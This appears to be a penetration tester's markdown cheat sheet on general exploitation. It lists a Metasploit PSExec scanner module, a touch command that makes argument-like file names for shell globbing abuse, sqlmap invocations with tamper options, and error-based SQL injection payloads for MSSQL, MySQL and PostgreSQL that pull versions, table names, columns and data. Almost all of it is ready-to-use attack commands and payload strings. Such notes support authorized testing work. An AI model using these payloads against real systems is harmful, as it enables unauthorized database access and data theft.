exploit-general.md

General Exploitation

⬅ Back to Index

---

Windows

MSF

• PSExec Scanner (Multi-load)
  • use auxiliary/scanner/smb/psexec_scanner

Linux

Linux File manipulation

• Create files with weird characters (used for globbing manipulation):

  touch -- "--file-with=weird characters"

Web

SQL Injection

SQLMap

• sqlmap -u <uri> --data "{ \"user\": \"1\"}" --tamper=charunicodeescape --dbms=<type> --technique=<technique>
  • Techniques:
    • Default - all
    • T - time based
• sqlmap -r <file>
  • Reads URL, Method, Data/Parameters from file in the format of Network request export (e.g. from BURP).

MSSQL

• Error-based SQLi
  • General: or 1 in (SELECT TOP 1 CAST(query as varchar(4096))) -- -
    • Where query is anything like:
    • @@version
    • user_name()
    • db_name(0) calls master..sysdatabases
  • Get tables: or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM db..sysobjects where xtype='U' and name no in ('','')); -- -
    • Where db is the database name and '','' is an increasing list of known tables starting from blank '' when none are known.
  • Columns: db..syscolumns.name
  • Data: db..table where column not in ('')
  • Casting to varchar to trigger errors: CAST(id as varchar)+char(59) (urlencode + to %2b if needed)
    • Output will look like <int-etc>; with char(59) (;) triggering the varchar type change.

MySQL

• Error-based SQLi
  • General: union select count(*), concat(value, floor(rand(0)*2)) as z from information_schema.tables group by z;

PostgreSQL

• Error-base SQLi
  • General: select cast(query as numeric);
    • version()
    • (select table_name from information_schema.tables limit 1 offset x) - offset 0,1,2,etc...